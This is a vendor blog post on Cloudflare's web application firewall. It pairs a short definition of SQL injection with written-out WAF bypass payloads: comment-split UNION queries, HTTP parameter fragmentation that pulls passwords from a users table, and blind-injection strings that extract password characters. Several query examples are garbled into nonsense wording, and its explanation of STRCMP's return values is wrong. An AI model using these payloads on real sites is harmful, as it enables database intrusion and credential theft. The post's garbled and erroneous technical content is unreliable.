Bobcares

Cloudflare WAF SQL Injection Management

by | Jul 11, 2022

Cloudflare Web Application Firewall or WAF is effective to prevent SQL injection and other forms of attacks to ensure data security.

Bobcares answers all questions no matter the size, as part of our Server management services

Let us take a look at Cloudflare WAF SQL Injection in detail.

SQLi

A SQL injection attack involves inserting or “injecting” a SQL query into the program via the client’s input data. A successful SQL injection exploit can read sensitive data from the database. It can modify database data (Insert/Update/Delete) and perform database administration operations (such as shutting down the DBMS). And it can recover the content of a given file on the DBMS file system. In some cases, issue commands to the operating system. SQL injection attacks are a sort of injection attack. The SQL command injects into data-plane input to cause the execution of SQL commands.

Bypassing WAF: SQL Injection – Normalization Method

Example of a vulnerability in the function of request Normalization.

The following request does not permit someone to launch an attack.

 /?id=1+union+select+1,2,3/*

If the WAF contains a relevant vulnerability, this request will be successfully executed./?id=1/*union*/union/*select*/select+1,2,3/*. And after that the request will look like this:index.php?id=1/*uni X on*/union/*sel X ect*/select+1,2,3/*.

Note that the example works when cleaning harmful traffic. And, not when blocking the request of the attack source.

Example of a vulnerability in the request Normalization function.

The code /?id=1+union+select+1,2,3/* follows the same function of stopping an attack

The/?id=1+un/**/ion+sel/**/ect+1,2,3-- executes the WAF. Note that only in the case of a vulnerability. And after executing the SQL request will be as shown below:

SELECT * from table where id =1 union select 1,2,3--

It should be noted that any symbol sequence that WAF breaks off can be used instead of construction /**/ (e.g., #####, percent 00).

Bypassing WAF: SQL Injection – HPF Using HTTP Parameter Fragmentation (HPF)

The code Query("select * from table where a=".$_GET['a']." and b=".$_GET['b']);  Query("select * from table where a=".$_GET['a']." and b=".$_GET['b']." limit".$_GET['c']); is the representation of a vulnerable code.

In this case the requests such as/?a=1+union+select+1,2/* prevents anyone from performing an attack. WIth HPF the requests can be performed /?a=1+union/*&b=*/select+1,2  /?a=1+union/*&b=*/select+1,pass/*&c=*/from+users--. As a result, the SQL request will be select * from table where a=1 union/* and b=*/select 1,2  select * from table where a=1 union/* and b=*/select 1,pass/* limit */from users--.

Bypassing WAF: Blind SQL Injection Using logical requests AND/OR

The following requests or queries enable a successful attack against many WAFs.

 /?id=1+OR+0x50=0x50  /?id=1+and+ascii(lower(mid((select+pwd+from+users+limit+1,1),1,1)))=74

By substituting SQL functions that access WAF signatures with their synonyms, the blind-SQL injection, anyone can exploit the vulnerability. substring() -> mid(), substr() ascii() -> hex(), bin() benchmark() -> sleep() Numerous different logical requests. and 1 or 1 and 1=1 and 2<3 and ‘a’=’a’ and ‘a’<>‘b’ and char(32)=’ ‘ and 3<=2 and 5<=>4 and 5<=>5 and 5 is null or 5 is not null.

An example of various request notations with the same meaning.

select user from mysql.user where user = ‘user’ OR mid(password,1,1)=’*’ user from mysql.user so, user = ‘user’ OR mid(password,1,1)=0x2a appy user from mysql.user where user = ‘user’ OR mid(password,1,1)=unhex(‘2a’) choose the user mysql.user and user = ‘user’.mid(password,1,1) regexp ‘[*]’ select user from mysql.user where user = ‘user’

Mid(password,1,1) like ‘*’ choose the user from mysql.user so user = ‘user’ OR mid(password,1,1) rlike ‘[*]’ select user from mysql.user where user = ‘user’ OR ord(mid(password,1,1))=42 select user from mysql.user where user = ‘user’

Ascii(mid(password,1,1))=42  user from  mysql.user where user = ‘user’ OR   find_in_set(‘2a’,hex(mid(password,1,1)))=1 user from the mysql.user where user = ‘user’

OR position(0x2a in password)=1 select user from mysql.user where user = ‘user’ OR locate(0x2a,password)=1 Known: substring((select ‘password’),1,1) = 0x70 substr((select ‘password’),1,1) = 0x70 mid((select ‘password’),1,1) = 0x70 New: strcmp(left(‘password’,1), 0x69) = 1 strcmp(left(‘password’,1), 0x70) = 0 strcmp(left(‘password’,1), 0x71) = -1 STRCMP(expr1,expr2) returns 1 unless the first argument is less than the second one, -1 if the strings are the same, and 0 otherwise.

Protect websites against SQL injections and more

Web Application Firewall (WAF) by Cloudflare guards against threats and vulnerabilities that target the application layer. The threats include such as SQL injection, cross-site scripting (XSS), and zero-day attacks.OWASP’s most serious web application security issues are under the guard of WAF.  By default executes ModSecurity rule sets. Additionally, it can manage both current rule sets and unique rules. Rules take effect in less than 30 seconds.

Cloud deployment plus DDoS mitigation and CDN. Cloudflare’s WAF doesn’t require any installation or upkeep of hardware or software because it is a cloud-based service. With just one click, deploy the WAF and adjust it to suit your requirements.

The user can gain more capabilities for no extra cost because it is integrated into the total Cloudflare service. To make a website function more quickly, a user can protect it against DDoS attacks and the global content delivery network.

[Need assistance with similar queries? We are here to help]

Conclusion

To conclude, Cloudflare WAF SQL injection; Cloudflare’s Web Application Firewall (WAF) safeguards websites against SQL injection, cross-site scripting (XSS), and zero-day attacks, as well as OWASP-identified vulnerabilities and threats to the application layer.

PREVENT YOUR SERVER FROM CRASHING!

Never again lose customers to poor server speed! Let us help you.

Our server experts will monitor & maintain your server 24/7 so that it remains lightning fast and secure.

GET STARTED

0 Comments

Submit a Comment

Your email address will not be published. Required fields are marked *

Never again lose customers to poor
server speed! Let us help you.